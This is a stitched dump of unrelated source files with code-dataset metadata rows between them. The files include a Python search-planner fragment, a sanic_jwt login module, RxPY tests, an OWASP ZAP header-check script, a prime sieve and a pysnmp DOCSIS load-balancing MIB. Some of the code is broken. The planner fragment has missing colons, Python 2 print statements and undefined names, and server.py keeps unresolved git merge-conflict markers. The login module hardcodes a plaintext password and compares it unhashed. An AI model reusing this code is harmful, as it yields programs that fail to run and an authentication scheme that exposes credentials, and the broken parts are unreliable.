self.learner_policy = None #This will be set prior to running a polciy using set_learner_policy
#Data structures for planning
self.frontier = [] #Frontier is un-sorted as it is sorted on demand (using heuristic)
self.oracle_frontier = PriorityQueue() #Frontier sorted according to oracle(for mixing)
self.visited = {} #Keep track of visited cells
self.c_obs = [] #Keep track of collision checks done so far
self.cost_so_far = defaultdict(lambda: np.inf) #Keep track of cost of path to the node
self.came_from = {} #Keep track of parent during search
self.learner = SupervisedRegressionNetwork(learner_params) #learner is a part of the environment
def initialize(self, env_folder, oracle_folder, num_envs, file_start_num, phase='train', visualize=False):
"""Initialize everything"""
self.env_folder = env_folder
self.oracle_folder = oracle_folder
self.num_envs = num_envs
self.phase = phase
self.visualize = visualize
self.curr_env_num = file_start_num - 1
def set_mixing_param(self, beta):
self.beta = beta
def run_episode(k_tsteps=None, max_expansions=1000000):
assert self.initialized == True, "Planner has not been initialized properly. Please call initialize or reset_problem function before plan function"
start_t = time.time()
data = [] #Dataset that will be filled during training
self.came_from[self.start_n]= (None, None)
self.cost_so_far[self.start_n] = 0. #For each node, this is the cost of the shortest path to the start
self.num_invalid_predecessors[start] = 0
self.num_invalid_siblings[start] = 0
self.depth_so_far[start] = 0
if self.phase == "train":
start_h_val = self.oracle[self.start_n]
self.oracle_frontier.put(self.start_n, start_h_val)
self.frontier.append(self.start_n) #This frontier is just a list
curr_expansions = 0 #Number of expansions done
num_rexpansions = 0
found_goal = False
path =[]
path_cost = np.inf
while len(self.frontier) > 0:
#Check 1: Stop search if frontier gets too large
if curr_expansions >= max_expansions:
print("Max Expansions Done.")
break
#Check 2: Stop search if open list gets too large
if len(self.frontier) > 500000:
print("Timeout.")
break
#################################################################################################
#Step 1: With probability beta, we select the oracle and (1-beta) we select the learner, also we collect data if
# curr_expansions is in one of the k timesteps
if phase == "train":
if curr_expansions in k_tsteps:
rand_idx = np.random.randint(len(self.frontier))
n = self.frontier[rand_idx] #Choose a random action
data.append(self.get_feature_vec[n], self.curr_oracle[n]) #Query oracle for Q-value of that action and append to dataset
if np.random.random() <= self.beta:
h, curr_node = self.oracle_frontier.get()
else
curr_node = self.get_best_node()
else:
curr_node = self.get_best_node()
#################################################################################################
if curr_node in self.visited:
continue
#Step 3: Add to visited
self.visited[curr_node] = 1
#Check 3: Stop search if goal found
if curr_node == self.goal_node:
print "Found goal"
found_goal = True
break
#Step 4: If search has not ended, add neighbors of current node to frontier
neighbors, edge_costs, valid_edges, invalid_edges = self.get_successors(curr_node)
#Update the features of the parent and current node
n_invalid_edges = len(invalid_edges)
self.num_invalid_grand_children[self.came_from[curr_node][0]] += n_invalid_edges
self.num_invalid_children[curr_node] = n_invalid_edges
#Step 5: Update c_obs with collision checks performed
self.c_obs.append(invalid_edges)
g = self.cost_so_far[curr_node]
for i, neighbor in enumerate(neighbors):
new_g = g + edge_costs[i]
if neighbor not in self.visited
#Add neighbor to open only if it wasn't in open already (don't need duplicates) [Note: Only do this if ordering in the frontier doesn't matter]
if neighbor not in self.cost_so_far:
#Update the oracle frontier only during training (for mixing)
if self.phase == "train":
h_val = self.curr_oracle[neighbor]
self.oracle_frontier.put(neighbor, h_val)
self.frontier.append(neighbor)
#Keep track of cost of shortest path to neighbor and parent it came from (for features and reconstruct path)
if new_g < self.cost_so_far[neighbor]:
self.came_from[neighbor] = (curr_node, valid_edges[i])
self.cost_so_far[neighbor] = new_g
#Update feature dicts
self.learner.cost_so_far[neighbor] = new_g
self.learner.num_invalid_predecessors[neighbor] = self.num_invalid_predecessors[curr_node] + n_invalid_edges
self.learner.num_invalid_siblings[neighbor] = n_invalid_edges
self.learner.depth_so_far[neighbor] = self.depth_so_far[curr_node] + 1
#Step 6:increment number of expansions
curr_expansions += 1
if found_goal:
path, path_cost = self.reconstruct_path(self.came_from, self.start_node, self.goal_node, self.cost_so_far)
else:
print ('Found no solution, priority queue empty')
time_taken = time.time()- start_t
return path, path_cost, curr_expansions, time_taken, self.came_from, self.cost_so_far, self.c_obs #Run planner on current env and return data seetn. Also, update current env to next env
def get_heuristic(self, node, goal):
"""Given a node and goal, calculate features and get heuristic value"""
return 0
def get_best_node(self):
"""Evaluates all the nodes in the frontier and returns the best node"""
return None
def sample_world(self, mode='cycle'):
self.curr_env_num = (self.curr_env_num+1)%self.num_envs
file_path = os.path.join(os.path.abspath(self.env_folder), str(self.curr_env_num)+'.png')
self.curr_env = initialize_env_from_file(file_path)
def compute_oracle(self, mode='cycle'):
file_path = os.path.join(os.path.abspath(self.oracle_folder), "oracle_"+str(self.curr_env_num)+'.p')
self.curr_oracle = pickle.load(cost_so_far, open(file_path, 'rb'))
def initialize_env_from_file(self, file_path):
env = Env2D()
env.initialize(file_path, self.env_params)
if self.visualize:
self.env.initialize_plot(self.lattice.node_to_state(self.start_node), self.lattice.node_to_state(self.goal_node))
self.initialized = True
return env
def clear_planner(self):
self.frontier.clear()
self.visited = {}
self.c_obs = []
self.cost_so_far = {}
self.came_from = {}
| 45.093596
| 192
| 0.693358
| 8,038
| 0.878086
| 0
| 0
| 0
| 0
| 0
| 0
| 2,606
| 0.284684
|
65c266ffeb9dad82408ef950252b4d7368839fc3
| 966
|
py
|
Python
|
opi_dragon_api/auth/__init__.py
|
CEAC33/opi-dragon-api
|
8f050a0466dab4aaeec13151b9f49990bbd73640
|
[
"MIT"
] | null | null | null |
opi_dragon_api/auth/__init__.py
|
CEAC33/opi-dragon-api
|
8f050a0466dab4aaeec13151b9f49990bbd73640
|
[
"MIT"
] | null | null | null |
opi_dragon_api/auth/__init__.py
|
CEAC33/opi-dragon-api
|
8f050a0466dab4aaeec13151b9f49990bbd73640
|
[
"MIT"
] | null | null | null |
from sanic_jwt import exceptions
class User:
def __init__(self, id, username, password):
self.user_id = id
self.username = username
self.password = password
def __repr__(self):
return "User(id='{}')".format(self.user_id)
def to_dict(self):
return {"user_id": self.user_id, "username": self.username}
users = [User(1, "opi-user", "~Zñujh*B2D`9T!<j")]
username_table = {u.username: u for u in users}
userid_table = {u.user_id: u for u in users}
async def my_authenticate(request, *args, **kwargs):
username = request.json.get("username", None)
password = request.json.get("password", None)
if not username or not password:
raise exceptions.AuthenticationFailed("Missing username or password.")
user = username_table.get(username, None)
if user is None or password != user.password:
raise exceptions.AuthenticationFailed("Incorrect username or password")
return user
| 29.272727
| 79
| 0.677019
| 321
| 0.331954
| 0
| 0
| 0
| 0
| 463
| 0.4788
| 146
| 0.150982
|
65c2afb8b2d130681f854965474e19205bdcd378
| 5,087
|
py
|
Python
|
tests/test_observable/test_dowhile.py
|
yutiansut/RxPY
|
c3bbba77f9ebd7706c949141725e220096deabd4
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2018-11-16T09:07:13.000Z
|
2018-11-16T09:07:13.000Z
|
tests/test_observable/test_dowhile.py
|
yutiansut/RxPY
|
c3bbba77f9ebd7706c949141725e220096deabd4
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tests/test_observable/test_dowhile.py
|
yutiansut/RxPY
|
c3bbba77f9ebd7706c949141725e220096deabd4
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2020-05-08T08:23:08.000Z
|
2020-05-08T08:23:08.000Z
|
import unittest
from rx.testing import TestScheduler, ReactiveTest
class TestDoWhile(ReactiveTest, unittest.TestCase):
def test_dowhile_always_false(self):
scheduler = TestScheduler()
xs = scheduler.create_cold_observable(
self.on_next(50, 1),
self.on_next(100, 2),
self.on_next(150, 3),
self.on_next(200, 4),
self.on_completed(250))
def create():
return xs.do_while(lambda _: False)
results = scheduler.start(create=create)
assert results.messages == [
self.on_next(250, 1),
self.on_next(300, 2),
self.on_next(350, 3),
self.on_next(400, 4),
self.on_completed(450)]
assert xs.subscriptions == [self.subscribe(200, 450)]
def test_dowhile_always_true(self):
scheduler = TestScheduler()
xs = scheduler.create_cold_observable(
self.on_next(50, 1),
self.on_next(100, 2),
self.on_next(150, 3),
self.on_next(200, 4),
self.on_completed(250))
def create():
return xs.do_while(lambda _: True)
results = scheduler.start(create=create)
assert results.messages == [
self.on_next(250, 1),
self.on_next(300, 2),
self.on_next(350, 3),
self.on_next(400, 4),
self.on_next(500, 1),
self.on_next(550, 2),
self.on_next(600, 3),
self.on_next(650, 4),
self.on_next(750, 1),
self.on_next(800, 2),
self.on_next(850, 3),
self.on_next(900, 4)]
assert xs.subscriptions == [
self.subscribe(200, 450),
self.subscribe(450, 700),
self.subscribe(700, 950),
self.subscribe(950, 1000)]
def test_dowhile_always_true_on_error(self):
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_cold_observable(self.on_error(50, ex))
def create():
return xs.do_while(lambda _: True)
results = scheduler.start(create=create)
assert results.messages == [self.on_error(250, ex)]
assert xs.subscriptions == [self.subscribe(200, 250)]
def test_dowhile_always_true_infinite(self):
scheduler = TestScheduler()
xs = scheduler.create_cold_observable(self.on_next(50, 1))
def create():
return xs.do_while(lambda _: True)
results = scheduler.start(create=create)
assert results.messages == [
self.on_next(250, 1)]
assert xs.subscriptions == [self.subscribe(200, 1000)]
def test_dowhile_sometimes_true(self):
scheduler = TestScheduler()
xs = scheduler.create_cold_observable(
self.on_next(50, 1),
self.on_next(100, 2),
self.on_next(150, 3),
self.on_next(200, 4),
self.on_completed(250))
n = [0]
def create():
def condition(x):
n[0] += 1
return n[0]<3
return xs.do_while(condition)
results = scheduler.start(create=create)
assert results.messages == [
self.on_next(250, 1),
self.on_next(300, 2),
self.on_next(350, 3),
self.on_next(400, 4),
self.on_next(500, 1),
self.on_next(550, 2),
self.on_next(600, 3),
self.on_next(650, 4),
self.on_next(750, 1),
self.on_next(800, 2),
self.on_next(850, 3),
self.on_next(900, 4),
self.on_completed(950)]
assert xs.subscriptions == [
self.subscribe(200, 450),
self.subscribe(450, 700),
self.subscribe(700, 950)]
def test_dowhile_sometimes_throws(self):
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_cold_observable(
self.on_next(50, 1),
self.on_next(100, 2),
self.on_next(150, 3),
self.on_next(200, 4),
self.on_completed(250))
n = [0]
def create():
def condition(x):
n[0] += 1
if n[0]<3:
return True
else:
raise Exception(ex)
return xs.do_while(condition)
results = scheduler.start(create=create)
assert results.messages == [
self.on_next(250, 1),
self.on_next(300, 2),
self.on_next(350, 3),
self.on_next(400, 4),
self.on_next(500, 1),
self.on_next(550, 2),
self.on_next(600, 3),
self.on_next(650, 4),
self.on_next(750, 1),
self.on_next(800, 2),
self.on_next(850, 3),
self.on_next(900, 4),
self.on_error(950, ex)]
assert xs.subscriptions == [
self.subscribe(200, 450),
self.subscribe(450, 700),
self.subscribe(700, 950)]
| 31.79375
| 68
| 0.525654
| 5,016
| 0.986043
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 0.001573
|
65c311baef365241a86f5ea9eee583a30d354076
| 1,459
|
py
|
Python
|
ZAP_Scripts/passive/14-4-2-api-content-disposition-header.py
|
YaleUniversity/ZAP_ASVS_Checks
|
f69b57f5fe0bc196ffc57fb1bb0762ffb367c1cb
|
[
"MIT"
] | 3
|
2022-01-22T11:21:23.000Z
|
2022-03-09T06:45:55.000Z
|
ZAP_Scripts/passive/14-4-2-api-content-disposition-header.py
|
YaleUniversity/ZAP_ASVS_Checks
|
f69b57f5fe0bc196ffc57fb1bb0762ffb367c1cb
|
[
"MIT"
] | null | null | null |
ZAP_Scripts/passive/14-4-2-api-content-disposition-header.py
|
YaleUniversity/ZAP_ASVS_Checks
|
f69b57f5fe0bc196ffc57fb1bb0762ffb367c1cb
|
[
"MIT"
] | null | null | null |
"""
Script testing 14.4.2 control from OWASP ASVS 4.0:
'Verify that all API responses contain a Content-Disposition: attachment;
filename="api.json" header (or other appropriate filename for the content
type).'
The script will raise an alert if 'Content-Disposition' header is present but not follow the format - Content-Disposition: attachment; filename=
"""
def scan(ps, msg, src):
#find "Content-Disposition" header
header = str(msg.getResponseHeader().getHeader("Content-Disposition"))
#alert parameters
alertRisk= 1
alertConfidence = 2
alertTitle = "14.4.2 Verify that all API responses contain a Content-Disposition."
alertDescription = "Verify that all API responses contain a Content-Disposition: attachment; filename='api.json'header (or other appropriate filename for the content type)."
url = msg.getRequestHeader().getURI().toString()
alertParam = ""
alertAttack = ""
alertInfo = "https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload"
alertSolution = "Use the format 'Content-Disposition: attachment; filename=' for API responses"
alertEvidence = ""
cweID = 116
wascID = 0
# if "attachment; filename=" is not in "Content-Disposition" header, raise alert
if ("attachment; filename=" not in header.lower()):
ps.raiseAlert(alertRisk, alertConfidence, alertTitle, alertDescription,
url, alertParam, alertAttack, alertInfo, alertSolution, alertEvidence, cweID, wascID, msg);
| 41.685714
| 175
| 0.749143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 921
| 0.631254
|
65c34c95b750096053aaef54a2b648be5c44772c
| 230
|
py
|
Python
|
server.py
|
Peopple-Shopping-App/mockserver
|
c38c3f325e44f4eaba39cdbe24544e3181307218
|
[
"MIT"
] | 1
|
2021-07-23T03:43:19.000Z
|
2021-07-23T03:43:19.000Z
|
server.py
|
Peopple-Shopping-App/mockserver
|
c38c3f325e44f4eaba39cdbe24544e3181307218
|
[
"MIT"
] | null | null | null |
server.py
|
Peopple-Shopping-App/mockserver
|
c38c3f325e44f4eaba39cdbe24544e3181307218
|
[
"MIT"
] | null | null | null |
import uvicorn
if __name__ == '__main__':
<<<<<<< HEAD
uvicorn.run('app.main:app', host='0.0.0.0', port=80)
=======
uvicorn.run('app.main:app', host='0.0.0.0', port=2323)
>>>>>>> c583e3d93c9b7f8e76ce1d676a24740b62ef3552
| 23
| 58
| 0.630435
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 56
| 0.243478
|
65c37b82e34797425fdb4ac383cf6c771dd605d3
| 399
|
py
|
Python
|
9020/main.py
|
yeonghoey/baekjoon
|
a3f7c0aa901ad0e2ca6a863f1867fc574feb8c8e
|
[
"MIT"
] | 1
|
2018-09-20T05:15:30.000Z
|
2018-09-20T05:15:30.000Z
|
9020/main.py
|
yeonghoey/baekjoon
|
a3f7c0aa901ad0e2ca6a863f1867fc574feb8c8e
|
[
"MIT"
] | null | null | null |
9020/main.py
|
yeonghoey/baekjoon
|
a3f7c0aa901ad0e2ca6a863f1867fc574feb8c8e
|
[
"MIT"
] | null | null | null |
MAX_N = 10000 + 1
isprime = [True] * (MAX_N)
isprime[0] = False
isprime[1] = False
for i in range(2, MAX_N):
if not isprime[i]:
continue
for j in range(i+i, MAX_N, i):
isprime[j] = False
T = int(input())
for _ in range(T):
n = int(input())
for i in range(n//2, 1, -1):
if isprime[i] and isprime[n-i]:
print('%d %d' % (i, n-i))
break
| 21
| 39
| 0.513784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 0.017544
|
65c451b4c4af62ac430c54bacf4793ebfef0c2ef
| 48,201
|
py
|
Python
|
pysnmp-with-texts/DOCS-LOADBALANCING-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/DOCS-LOADBALANCING-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/DOCS-LOADBALANCING-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module DOCS-LOADBALANCING-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/DOCS-LOADBALANCING-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:53:17 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueSizeConstraint, ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint")
clabProjDocsis, = mibBuilder.importSymbols("CLAB-DEF-MIB", "clabProjDocsis")
docsIfCmtsCmStatusIndex, docsIfCmtsCmStatusEntry = mibBuilder.importSymbols("DOCS-IF-MIB", "docsIfCmtsCmStatusIndex", "docsIfCmtsCmStatusEntry")
InterfaceIndex, = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex")
ObjectGroup, NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "ObjectGroup", "NotificationGroup", "ModuleCompliance")
ModuleIdentity, Gauge32, Counter32, IpAddress, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, NotificationType, Bits, TimeTicks, Counter64, Unsigned32, zeroDotZero, Integer32, iso, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "ModuleIdentity", "Gauge32", "Counter32", "IpAddress", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "NotificationType", "Bits", "TimeTicks", "Counter64", "Unsigned32", "zeroDotZero", "Integer32", "iso", "ObjectIdentity")
TimeStamp, TruthValue, TextualConvention, DisplayString, RowStatus, RowPointer, MacAddress = mibBuilder.importSymbols("SNMPv2-TC", "TimeStamp", "TruthValue", "TextualConvention", "DisplayString", "RowStatus", "RowPointer", "MacAddress")
docsLoadBalanceMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2))
docsLoadBalanceMib.setRevisions(('2004-03-10 17:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: docsLoadBalanceMib.setRevisionsDescriptions(('Initial version of this mib module.',))
if mibBuilder.loadTexts: docsLoadBalanceMib.setLastUpdated('200403101700Z')
if mibBuilder.loadTexts: docsLoadBalanceMib.setOrganization('Cable Television Laboratories, Inc')
if mibBuilder.loadTexts: docsLoadBalanceMib.setContactInfo(' Postal: Cable Television Laboratories, Inc. 400 Centennial Parkway Louisville, Colorado 80027-1266 U.S.A. Phone: +1 303-661-9100 Fax: +1 303-661-9199 E-mail: mibs@cablelabs.com')
if mibBuilder.loadTexts: docsLoadBalanceMib.setDescription('This is the MIB Module for the load balancing. Load balancing is manageable on a per-CM basis. Each CM is assigned: a) to a set of channels (a Load Balancing Group) among which it can be moved by the CMTS b) a policy which governs if and when the CM can be moved c) a priority value which can be used by the CMTS in order to select CMs to move.')
class ChannelChgInitTechMap(TextualConvention, Bits):
description = "This textual convention enumerates the Initialization techniques for Dynamic Channel Change (DCC). The techniques are represented by the 5 most significant bits (MSB). Bits 0 through 4 map to initialization techniques 0 through 4. Each bit position represents the internal associated technique as described below: reinitializeMac(0) : Reinitialize the MAC broadcastInitRanging(1): Perform Broadcast initial ranging on new channel before normal operation unicastInitRanging(2) : Perform unicast ranging on new channel before normal operation initRanging(3) : Perform either broadcast or unicast ranging on new channel before normal operation direct(4) : Use the new channel(s) directly without re-initializing or ranging Multiple bits selection in 1's means the CMTS selects the best suitable technique among the selected in a proprietary manner. An empty value or a value with all bits in '0' means no channel changes allowed"
status = 'current'
namedValues = NamedValues(("reinitializeMac", 0), ("broadcastInitRanging", 1), ("unicastInitRanging", 2), ("initRanging", 3), ("direct", 4))
docsLoadBalNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 0))
docsLoadBalMibObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1))
docsLoadBalSystem = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1))
docsLoadBalChgOverObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2))
docsLoadBalGrpObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3))
docsLoadBalPolicyObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4))
docsLoadBalChgOverGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1))
docsLoadBalEnable = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalEnable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalEnable.setDescription('Setting this object to true(1) enables internal autonomous load balancing operation on this CMTS. Setting it to false(2) disables the autonomous load balancing operations. However moving a cable modem via docsLoadBalChgOverTable is allowed even when this object is set to false(2).')
docsLoadBalChgOverMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 1), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalChgOverMacAddress.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverMacAddress.setDescription('The mac address of the cable modem that the CMTS instructs to move to a new downstream frequency and/or upstream channel.')
docsLoadBalChgOverDownFrequency = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1000000000))).setUnits('hertz').setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalChgOverDownFrequency.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverDownFrequency.setDescription('The new downstream frequency to which the cable modem is instructed to move. The value 0 indicates that the CMTS does not create a TLV for the downstream frequency in the DCC-REQ message. This object has no meaning when executing UCC operations.')
docsLoadBalChgOverUpChannelId = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1, 255)).clone(-1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalChgOverUpChannelId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverUpChannelId.setDescription('The new upstream channel ID to which the cable modem is instructed to move. The value -1 indicates that the CMTS does not create a TLV for the upstream channel ID in the channel change request.')
docsLoadBalChgOverInitTech = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 4), ChannelChgInitTechMap()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalChgOverInitTech.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverInitTech.setDescription("The initialization technique that the cable modem is instructed to use when performing change over operation. By default this object is initialized with all the defined bits having a value of '1'.")
docsLoadBalChgOverCmd = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("any", 1), ("dcc", 2), ("ucc", 3))).clone('any')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalChgOverCmd.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverCmd.setDescription('The change over command that the CMTS is instructed use when performing change over operation. The any(1) value indicates that the CMTS is to use its own algorithm to determine the appropriate command.')
docsLoadBalChgOverCommit = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 6), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalChgOverCommit.setReference('Data-Over-Cable Service Interface Specifications: Radio Frequency Interface Specification SP-RFIv2.0-I04-030730, Sections C.4.1, 11.4.5.1.')
if mibBuilder.loadTexts: docsLoadBalChgOverCommit.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverCommit.setDescription("The command to execute the DCC/UCC operation when set to true(1). The following are reasons for rejecting an SNMP SET to this object: - The MAC address in docsLoadBalChgOverMacAddr is not an existing MAC address in docsIfCmtsMacToCmEntry. - docsLoadBalChgOverCmd is ucc(3) and docsLoadBalChgOverUpChannelId is '-1', - docsLoadBalChgOverUpChannelId is '-1' and docsLoadBalChgOverDownFrequency is '0'. - DCC/UCC operation is currently being executed for the cable modem, on which the new command is committed, specifically if the value of docsLoadBalChgOverStatusValue is one of: messageSent(1), modemDeparting(4), waitToSendMessage(6). - An UCC operation is committed for a non-existing upstream channel ID or the corresponding ifOperStatus is down(2). - A DCC operation is committed for an invalid or non-existing downstream frequency, or the corresponding ifOperStatus is down(2). In those cases, the SET is rejected with an error code 'commitFailed'. After processing the SNMP SET the information in docsLoadBalChgOverGroup is updated in a corresponding entry in docsLoadBalChgOverStatusEntry. Reading this object always returns false(2).")
docsLoadBalChgOverLastCommit = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 7), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverLastCommit.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverLastCommit.setDescription('The value of sysUpTime when docsLoadBalChgOverCommit was last set to true. Zero if never set.')
docsLoadBalChgOverStatusTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2), )
if mibBuilder.loadTexts: docsLoadBalChgOverStatusTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusTable.setDescription('A table of CMTS operation entries to reports the status of cable modems instructed to move to a new downstream and/or upstream channel. Using the docsLoadBalChgOverGroup objects. An entry in this table is created or updated for the entry with docsIfCmtsCmStatusIndex that correspond to the cable modem MAC address of the Load Balancing operation. docsLoadBalChgOverCommit to true(1).')
docsLoadBalChgOverStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1), ).setIndexNames((0, "DOCS-IF-MIB", "docsIfCmtsCmStatusIndex"))
if mibBuilder.loadTexts: docsLoadBalChgOverStatusEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusEntry.setDescription('A CMTS operation entry to instruct a cable modem to move to a new downstream frequency and/or upstream channel. An operator can use this to initiate an operation in CMTS to instruct the selected cable modem to move to a new downstream frequency and/or upstream channel.')
docsLoadBalChgOverStatusMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 1), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusMacAddr.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusMacAddr.setDescription('The mac address set in docsLoadBalChgOverMacAddress.')
docsLoadBalChgOverStatusDownFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1000000000))).setUnits('hertz').setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusDownFreq.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusDownFreq.setDescription('The Downstream frequency set in docsLoadBalChgOverDownFrequency.')
docsLoadBalChgOverStatusUpChnId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1, 255)).clone(-1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusUpChnId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusUpChnId.setDescription('The upstream channel ID set in docsLoadBalChgOverUpChannelId.')
docsLoadBalChgOverStatusInitTech = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 4), ChannelChgInitTechMap()).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusInitTech.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusInitTech.setDescription('The initialization technique set in docsLoadBalChgOverInitTech.')
docsLoadBalChgOverStatusCmd = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("any", 1), ("dcc", 2), ("ucc", 3))).clone('any')).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusCmd.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusCmd.setDescription('The load balancing command set in docsLoadBalChgOverCmd.')
docsLoadBalChgOverStatusValue = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("messageSent", 1), ("noOpNeeded", 2), ("modemDeparting", 3), ("waitToSendMessage", 4), ("cmOperationRejected", 5), ("cmtsOperationRejected", 6), ("timeOutT13", 7), ("timeOutT15", 8), ("rejectinit", 9), ("success", 10))).clone('waitToSendMessage')).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusValue.setReference('Data-Over-Cable Service Interface Specifications: Radio Frequency Interface Specification SP-RFIv2.0-I04-030730, Sections C.4.1, 11.4.5.1.')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusValue.setStatus('current')
